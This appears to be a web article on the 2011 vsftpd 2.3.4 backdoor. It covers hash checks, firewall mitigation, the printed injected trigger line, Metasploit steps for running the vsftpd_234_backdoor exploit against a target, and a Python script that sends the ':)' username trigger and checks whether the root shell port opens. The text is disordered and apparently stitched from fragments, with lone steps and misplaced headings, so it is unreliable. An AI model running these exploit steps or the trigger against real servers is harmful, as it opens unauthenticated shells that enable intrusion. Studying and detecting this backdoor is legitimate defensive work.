For those already comfortable with the Metasploit Framework:
To compare the installed binary against a known-good hash (for example the one recorded by your distribution's package for vsftpd), run:
md5sum /usr/sbin/vsftpd
The hash is only meaningful next to a trusted reference value; the 2011 backdoor was inserted into the source archive, so a binary built from that archive will not match one built from clean sources.
The good news is that the backdoor was never part of vsftpd proper: it existed only in the tampered 2.3.4 source archive served from the compromised download server, and it is absent from the clean 2.3.4 sources and from every later release. To mitigate, rebuild vsftpd from a trusted, verified source archive or update to a current version.
The trigger in the tampered source is a byte-by-byte scan of the username that calls vsf_sysutil_extra(), the injected function that binds port 6200 and spawns the shell, whenever a ':' is followed by ')':
if ((p_str->p_buf[i] == ':') && (p_str->p_buf[i+1] == ')')) vsf_sysutil_extra();
You can test for the backdoor without running any command through the shell it opens: send the trigger, then simply check whether TCP port 6200 accepts a connection and close it again.
In July 2011, unknown attackers compromised the master download server for vsftpd and replaced the legitimate source code archive for version 2.3.4 with a tampered copy. The altered version contained a classic backdoor: if a client attempted to log in with a username ending in a smiley face emoticon ( :) ), the server immediately opened a command shell listening on TCP port 6200, without any valid credentials. (The injected check shown on this page matches the two characters anywhere in the username; appending them is simply the usual form.)
Block inbound TCP port 6200 at the perimeter firewall so that a backdoor triggered from inside cannot be reached from outside. This is a stopgap only: it does not remove the backdoor, so rebuild from clean sources as well.
For those looking to understand the full mechanics behind the attack, public analyses of the compromise and of the injected code are available.
Metasploit module (exploit/unix/ftp/vsftpd_234_backdoor): the Ruby implementation of the vsftpd 2.3.4 backdoor exploit that ships with the Metasploit Framework and is widely used by security professionals.
Select the module: use exploit/unix/ftp/vsftpd_234_backdoor
Set the target IP: set RHOSTS [Target_IP]
Review the settings: show options
Run the exploit: exploit

Remediation and Mitigation
For a broader list of vulnerabilities across different versions (such as the deny_file access-control bypass in 3.0.2), check the GitHub Advisory Database.
A typical Python exploit script for this backdoor, of the kind published on GitHub, follows a simple execution flow:
Disclaimer: This information is for educational purposes only and should only be tested in controlled, authorized environments.

Step 1: Identify the Target
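The safe check described earlier (trigger, then only see whether port 6200 accepts a connection) and the Python flow whose first step is listed above, as one added example; this is not code from the original page, from vsftpd or from Metasploit. It assumes a target that speaks plain FTP on the given port and a backdoor that listens on port 6200. The FakeBackdooredFtp class, the free_port() helper and the "probe" username are constructed stand-ins so the script runs offline against an in-process server that mimics only the trigger-then-listen behaviour.

```python
"""Probe for the vsftpd 2.3.4 backdoor without sending it any shell command.
Added example, not code from the page or from vsftpd/Metasploit. Assumes a
target speaking FTP on ftp_port and a backdoor that listens on shell_port
(6200 on real hosts). FakeBackdooredFtp is a constructed offline stand-in
that mimics only the trigger-then-listen behaviour."""
import socket
import threading
import time

BACKDOOR_PORT = 6200            # port bound by the injected vsf_sysutil_extra()
VULN_BANNER = b"vsFTPd 2.3.4"   # greeting of the affected release

def _readline(sock):
    """One CRLF-terminated FTP reply; b'' if the peer closed."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf

def banner_looks_vulnerable(banner):
    """Step 1, identify the target: b'220 (vsFTPd 2.3.4)\\r\\n'. Only a hint,
    since the backdoor lived in one tainted tarball and most 2.3.4 builds are clean."""
    return VULN_BANNER in banner

def trigger_username(base="probe"):
    """The injected check fires on ':' then ')' anywhere in the username."""
    return base + ":)"

def port_accepts(host, port, timeout=1.0):
    """Connect and close without writing a byte, so the shell gets no command."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def check_backdoor(host, ftp_port=21, shell_port=BACKDOOR_PORT, timeout=3.0, retries=5):
    """Steps 2-3: USER <x>:) and PASS, then see whether shell_port opened.
    A dict is returned so 'already open' is distinguishable from 'opened by us'."""
    report = {"already_listening": port_accepts(host, shell_port),
              "banner_vulnerable": False, "backdoor_opened": False}
    if report["already_listening"]:
        return report               # an open port now proves nothing about the trigger
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        report["banner_vulnerable"] = banner_looks_vulnerable(_readline(ctl))
        ctl.sendall(("USER %s\r\n" % trigger_username()).encode())
        _readline(ctl)              # 331 Please specify the password.
        ctl.sendall(b"PASS anything\r\n")
        # A backdoored server never answers PASS: it sits in accept() on 6200.
        for _ in range(retries):
            if port_accepts(host, shell_port):
                report["backdoor_opened"] = True
                break
            time.sleep(0.2)
    return report

class FakeBackdooredFtp:
    """Constructed test double (not vsftpd): greets like 2.3.4 and, if backdoored,
    binds shell_port after USER-with-smiley + PASS and then goes silent."""

    def __init__(self, shell_port, backdoored=True):
        self.shell_port, self.backdoored, self.shell = shell_port, backdoored, None
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(1)
        self.ftp_port = self.listener.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.listener.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        armed = False
        while True:
            line = _readline(conn)
            if not line:
                return
            if line.startswith(b"USER"):
                armed = self.backdoored and b":)" in line
                conn.sendall(b"331 Please specify the password.\r\n")
            elif line.startswith(b"PASS") and armed:
                self.shell = socket.socket()     # kept open, never accepted here
                self.shell.bind(("127.0.0.1", self.shell_port))
                self.shell.listen(1)
                return                           # no reply, like the real backdoor
            else:
                conn.sendall(b"530 Login incorrect.\r\n")

def free_port():
    """An unused localhost port for the offline demo."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

if __name__ == "__main__":
    port = free_port()
    srv = FakeBackdooredFtp(port)    # swap for a real host/port only when authorised
    print(check_backdoor("127.0.0.1", srv.ftp_port, port))
```

The pre-check of the shell port matters in practice: if something already answers on 6200 before the trigger is sent, a later "open" result cannot be attributed to the backdoor, so the probe stops and reports that instead. The retry loop covers the short delay between the PASS command and the listener being bound on a real host.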